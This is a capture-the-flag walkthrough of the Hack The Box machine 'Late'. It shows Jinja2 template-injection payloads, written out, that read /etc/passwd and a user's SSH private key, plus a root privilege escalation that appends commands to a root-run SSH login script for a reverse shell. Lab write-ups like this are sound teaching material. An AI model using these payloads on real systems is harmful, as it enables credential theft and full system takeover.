🕑Late

Link: https://app.hackthebox.com/machines/463

Nmap Scan

Let's start with enumeration with Nmap: nmap -sS -A -sC -sV -T5 -oN scan.txt 10.129.132.140

Port 22 & 80 are open. HTTP is hosted on Port 80

Let's visit that in our browser

Port 80

port 80

By seeing the website there isn't that much.

I found one link in the source code

source code

To visit that page, we have to add images.late.htb to our HOST

host

after editing /etc/hosts and adding our machine's IP we are good to do.

images.late.htb

This page converts any image to text like on OCR. So, let's upload an image and let's check the response

normal text

The output 👇

Here we can see that it has extracted the text from the image.

This image-to-text only detects some of the fonts I am currently using - ms word - font - bahnschrift landscape if this does not work try changing the fonts and size

Here we can see in the heading its written "flask" (information disclosure). From my previous experiences most of the flask-based application are vulnerable to SSTI

Let's try to upload an image containing SSTI payload {{7*7}} and check the response

Yess! It's vulnerable to SSTI.

Check this source for SSTI https://medium.com/@nyomanpradipta120/ssti-in-flask-jinja2-20b068fdaeee

Let's try {{congif.items()}}

Response 👇

But there wasn't any important or useful files.

Let's Check the passwd file so we can get the usernames.

Use the payload listed here https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server%20Side%20Template%20Injection/README.md#jinja2 (Jinja2- Read Remote file)

after too many payloads this worked {{ get_flashed_messages.globals.builtins.open("/etc/passwd").read() }}

passwd

the response 👇

So, we got the user that we need svc_acc

User Flag

Now, we can also read the User flag

user flag

The response 👇

Okay, now we have to figure out How we can get the Rev shell

SSH - Getting Shell

Let's try to read the id_rsa of the user svc_acc

using this payload: {{ get_flashed_messages.globals.builtins.open("/home/svc_acc/.ssh/id_rsa").read() }}

id_rsa

The response 👇

Now, copy the above Private Key to our machine removing the <p> and </p>

ssh

We are in!

Privilege Escalation

Let's copy linpeas to machine via SCP

scp

Let's run linpeas.sh

we got some interesting files with root privileges /usr/local/sbin

linpeas.sh

Let's check ssh-alert.sh

ssh-alert.sh

Looks like this running whenever a user gets connected using the ssh

So, we can modify this file and get the root flag

Let's check if this is executing as root or not. We can use pspy64 tool which is pre-installed in the machine.

Now re-login in some other terminal with ssh .Here we can see that ssh-alert.sh is running with UID=0 which means that is running with root permissions.

We can get the root flag with two ways.

Method 1 - With rev shell

Let's check if we have nc on the machine or not.

nc -h

Okay we have nc . We can just append the file contents of ssh-alert.sh to get a rev shell

we cannot edit ssh-slert.sh as we don't have any permission to edit that. So, we can only append that file using >>

Now, setup a listener on another terminal nc -lnvp 9004

Re-login with a SSH in the svc_acc to trigger our script. Boom! now we got a Rev shell on our listener, and we are Root!

Method 2 - Copying root.txt to our unprivileged user

we cannot edit ssh-slert.sh as we don't have any permission to edit that. So, we can only append that file using >>

We can just use the cat command to read the root.txt and append that to our svc_acc without any rev shell

  1. Create a flag.txt file under /home/svc_acc/

2. append our cat command to read the /root/root.txt to ssh-alert.sh

3. Re-login with a SSH in the svc_acc to trigger our script.

4. Check the flag.txt that we created in /home/svc_acc

root.txt

BOOM! Pwned!

Thanks for reading. Hope you have enjoyed and learned something.

For any questions feel free to ping me on Twitter or LinkedIn

PreviousRouter SpaceNextCTFs

Last updated